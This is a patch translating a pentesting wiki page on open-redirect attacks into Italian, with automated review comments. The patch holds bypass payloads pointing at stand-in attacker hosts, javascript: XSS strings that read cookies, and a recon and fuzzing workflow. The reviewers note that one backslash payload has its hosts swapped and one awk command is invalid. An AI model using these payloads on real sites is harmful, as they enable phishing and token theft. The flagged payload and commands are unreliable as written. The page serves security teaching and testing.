From a28c926aa6e6a9437c3ec62ff811fc1d0a5bf824 Mon Sep 17 00:00:00 2001 From: Translator Date: Wed, 1 Oct 2025 15:29:00 +0000 Subject: [PATCH] Translated ['src/pentesting-web/open-redirect.md'] to it --- src/pentesting-web/open-redirect.md | 123 ++++++++++++++++++++++++++-- 1 file changed, 115 insertions(+), 8 deletions(-) diff --git a/src/pentesting-web/open-redirect.md b/src/pentesting-web/open-redirect.md index 619578b89..dd5f25142 100644 --- a/src/pentesting-web/open-redirect.md +++ b/src/pentesting-web/open-redirect.md 
@@ -5,14 +5,25 @@ ## Open redirect -### Reindirizzamento a localhost o domini arbitrari +### Redirect to localhost or arbitrary domains +- Se l'app “allows only internal/whitelisted hosts”, prova notazioni alternative dell'host per raggiungere il loopback o le range interne tramite l'obiettivo del redirect: +- IPv4 loopback variants: 127.0.0.1, 127.1, 2130706433 (decimal), 0x7f000001 (hex), 017700000001 (octal) +- IPv6 loopback variants: [::1], [0:0:0:0:0:0:0:1], [::ffff:127.0.0.1] +- Punto finale e maiuscole/minuscole: localhost., LOCALHOST, 127.0.0.1. +- DNS wildcard che risolve al loopback: lvh.me, sslip.io (e.g., 127.0.0.1.sslip.io), traefik.me, localtest.me. Questi sono utili quando sono ammessi solo “subdomains of X” ma la risoluzione dell'host punta comunque a 127.0.0.1. +- I riferimenti network-path spesso bypassano validator ingenui che antepongono uno scheme o controllano solo i prefissi: +- //attacker.tld → interpretato come scheme-relative e naviga off-site usando lo scheme corrente. +- I trucchi con userinfo scavalcano i controlli contains/startswith contro trusted hosts: +- https://trusted.tld@attacker.tld/ → il browser naviga su attacker.tld ma semplici controlli di stringa “vedono” trusted.tld. +- Confusione nel parsing della backslash tra framework/browser: +- https://trusted.tld\@attacker.tld → alcuni backend trattano “\” come un carattere di path e passano la validazione; i browser normalizzano in “/” e interpretano trusted.tld come userinfo, inviando gli utenti a attacker.tld. Questo si verifica anche nei mismatch dei parser URL tra Node/PHP. {{#ref}} ssrf-server-side-request-forgery/url-format-bypass.md {{#endref}} -### Open Redirect a XSS +### Modern open-redirect to XSS pivots ```bash #Basic payload, javascript code is executed after "javascript:" javascript:alert(1) @@ -58,7 +69,36 @@ javascript://whitelisted.com?%a0alert%281%29 /x:1/:///%01javascript:alert(document.cookie)/ ";alert(0);// ``` -## Open Redirect caricamento di file svg +
+Payload più moderni per bypass basati su URL +```text +# Scheme-relative (current scheme is reused) +//evil.example + +# Credentials (userinfo) trick +https://trusted.example@evil.example/ + +# Backslash confusion (server validates, browser normalizes) +https://trusted.example\@evil.example/ + +# Schemeless with whitespace/control chars +evil.example%00 +%09//evil.example + +# Prefix/suffix matching flaws +https://trusted.example.evil.example/ +https://evil.example/trusted.example + +# When only path is accepted, try breaking absolute URL detection +/\\evil.example +/..//evil.example +``` + +``` +
+ +## Open Redirect uploading svg files + ```html @@ -68,7 +108,9 @@ xmlns="http://www.w3.org/2000/svg"> ``` -## Parametri di iniezione comuni + +## Common injection parameters + ``` /{payload} ?next={payload} @@ -143,17 +185,23 @@ RedirectUrl=https://c1h2e1.github.io Redirect=https://c1h2e1.github.io ReturnUrl=https://c1h2e1.github.io ``` -## Esempi di codice + +## Code examples #### .Net + ```bash response.redirect("~/mysafe-subdomain/login.aspx") ``` + #### Java + ```bash response.redirect("http://mysafedomain.com"); ``` + #### PHP + ```php ``` + +## Hunting and exploitation workflow (practical) + +- Single URL check with curl: + +```bash +curl -s -I "https://target.tld/redirect?url=//evil.example" | grep -i "^Location:" +``` + +- Discover and fuzz likely parameters at scale: + +
+Click to expand + +```bash +# 1) Raccogli URL storici, conserva quelli con parametri redirect comuni +cat domains.txt \ +| gau --o urls.txt # or: waybackurls / katana / hakrawler + +# 2) Grep parametri comuni e normalizza la lista +rg -NI "(url=|next=|redir=|redirect|dest=|rurl=|return=|continue=)" urls.txt \ +| sed 's/\r$//' | sort -u > candidates.txt + +# 3) Usa OpenRedireX per fuzz con il corpus di payload +cat candidates.txt | openredirex -p payloads.txt -k FUZZ -c 50 > results.txt + +# 4) Verifica manualmente gli hits interessanti +awk '/30[1237]|Location:/I' results.txt +``` +``` +
+ +- Non dimenticare i sink lato client nelle SPA: cerca window.location/assign/replace e helper del framework che leggono query/hash e reindirizzano. + +- I framework spesso introducono insidie (footguns) quando le destinazioni di redirect sono derivate da input non affidabili (query params, Referer, cookies). See Next.js notes about redirects and avoid dynamic destinations derived from user input. + +{{#ref}} +../network-services-pentesting/pentesting-web/nextjs.md +{{#endref}} + +- Flussi OAuth/OIDC: abusing open redirectors frequently escalates to account takeover by leaking authorization codes/tokens. See dedicated guide: + +{{#ref}} +./oauth-to-account-takeover.md +{{#endref}} + +- Le risposte server che implementano redirect senza Location (meta refresh/JavaScript) sono comunque sfruttabili per phishing e a volte possono essere concatenate. Grep per: +```html + + +``` ## Strumenti - [https://github.com/0xNanda/Oralyzer](https://github.com/0xNanda/Oralyzer) +- OpenRedireX – fuzzer per rilevare open redirects. Esempio: +```bash +# Install +git clone https://github.com/devanshbatham/OpenRedireX && cd OpenRedireX && ./setup.sh -## Risorse +# Fuzz a list of candidate URLs (use FUZZ as placeholder) +cat list_of_urls.txt | ./openredirex.py -p payloads.txt -k FUZZ -c 50 +``` +## Riferimenti -- In [https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Open Redirect](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Open%20Redirect) puoi trovare elenchi di fuzzing. +- Su https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Open%20Redirect puoi trovare fuzzing lists. 
- [https://pentester.land/cheatsheets/2018/11/02/open-redirect-cheatsheet.html](https://pentester.land/cheatsheets/2018/11/02/open-redirect-cheatsheet.html) - [https://github.com/cujanovic/Open-Redirect-Payloads](https://github.com/cujanovic/Open-Redirect-Payloads) - [https://infosecwriteups.com/open-redirects-bypassing-csrf-validations-simplified-4215dc4f180a](https://infosecwriteups.com/open-redirects-bypassing-csrf-validations-simplified-4215dc4f180a) - +- PortSwigger Web Security Academy – DOM-based open redirection: https://portswigger.net/web-security/dom-based/open-redirection +- OpenRedireX – A fuzzer for detecting open redirect vulnerabilities: https://github.com/devanshbatham/OpenRedireX {{#include ../banners/hacktricks-training.md}}
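Review bot: In hunk `@@ -5,14 +5,25 @@`, the backslash bullet contradicts itself: it says browsers normalize `\` to `/`, but `https://trusted.tld/@attacker.tld` then has host `trusted.tld` and path `/@attacker.tld`, so the browser would not treat `trusted.tld` as userinfo and would not land on `attacker.tld`. The order of the two hosts needs to be swapped (`https://attacker.tld\@trusted.tld`) for the stated bypass, where a backend that does not treat `\` as a delimiter sees `trusted.tld` as the host while the browser, treating `\` as a path separator, navigates to `attacker.tld`; the same payload is repeated in the `Payload più moderni` block and should be fixed there as well. Separately, this is an Italian translation but the heading was changed from `Reindirizzamento a localhost o domini arbitrari` back to the English `Redirect to localhost or arbitrary domains`, and the bullets keep untranslated fragments such as `“allows only internal/whitelisted hosts”`, `IPv4 loopback variants` and `subdomains of X`; please translate them or keep the original Italian heading.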
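Review bot: In hunk `@@ -58,7 +69,36 @@`, the `Payload più moderni per bypass basati su URL` block is followed by a stray unpaired `+```` line after its closing fence, which opens a new code block that swallows the `## Open Redirect uploading svg files` heading until the next ````html` fence; drop the extra fence. The same hunk also replaces the Italian headings `Open Redirect a XSS` and `Open Redirect caricamento di file svg` with English ones (`Modern open-redirect to XSS pivots`, `Open Redirect uploading svg files`), which is the wrong direction for a patch that translates the page to Italian.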
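Review bot: In hunk `@@ -68,7 +108,9 @@`, the only content change is replacing the Italian heading `Parametri di iniezione comuni` with the English `Common injection parameters`; keep the Italian heading, since the rest of the page (`Strumenti`, `Riferimenti`) stays in Italian and the commit subject says the file is being translated to it.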
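Review bot: In hunk `@@ -143,17 +185,23 @@`, `## Esempi di codice` is replaced by the English `## Code examples`, again reverting a translated heading; the blank-line additions around `#### .Net`, `#### Java` and `#### PHP` are fine. As a style point while touching these lines, the `.Net` and `Java` snippets are fenced as ````bash` although they contain C#/Java code; retagging them as ````csharp` and ````java` would fix the highlighting without changing content.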
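Review bot: In the `Hunting and exploitation workflow (practical)` hunk, step 3 pipes `candidates.txt` into `openredirex -p payloads.txt -k FUZZ`, but step 2 only greps URLs containing parameters such as `url=` or `next=` and never substitutes the parameter value with the `FUZZ` keyword, so the fuzzer has nothing to replace; add a rewrite step (for example `sed -E 's/(url|next|redir|redirect|dest|rurl|return|continue)=[^&]*/\1=FUZZ/'`) before calling OpenRedireX, as the tool section itself says to "use FUZZ as placeholder". Step 4, `awk '/30[1237]|Location:/I' results.txt`, is not valid awk: regex literals take no `I` case-insensitivity suffix, and the trailing `I` is parsed as an (empty) variable concatenated onto the match result, so the pattern is a non-empty string and matches every line; use `grep -Ei '30[1237]|Location:' results.txt` or `awk 'tolower($0) ~ /location:/ || /30[1237]/'`. The bash block is also closed twice (`+```` followed by another `+````), leaving an open fence that swallows the following `- Non dimenticare i sink lato client` bullets; remove the second fence. Finally, the bullet on framework footguns mixes languages (`See Next.js notes about redirects and avoid dynamic destinations derived from user input` inside an Italian sentence), as does the OAuth bullet; translate them fully.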
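Review bot: In the `## Strumenti` / `## Riferimenti` hunk, the OpenRedireX install snippet invokes `./openredirex.py` while the workflow earlier in the patch calls a bare `openredirex`; pick one form (the `setup.sh` install shown here is what the earlier snippet relies on) so readers can copy either block as-is. OpenRedireX is also listed twice, once under `Strumenti` with the example and again under `Riferimenti` as a plain link; one entry is enough. The PayloadsAllTheThings line reads `Su ... puoi trovare fuzzing lists`, mixing Italian and English; `liste di fuzzing` keeps the line in Italian.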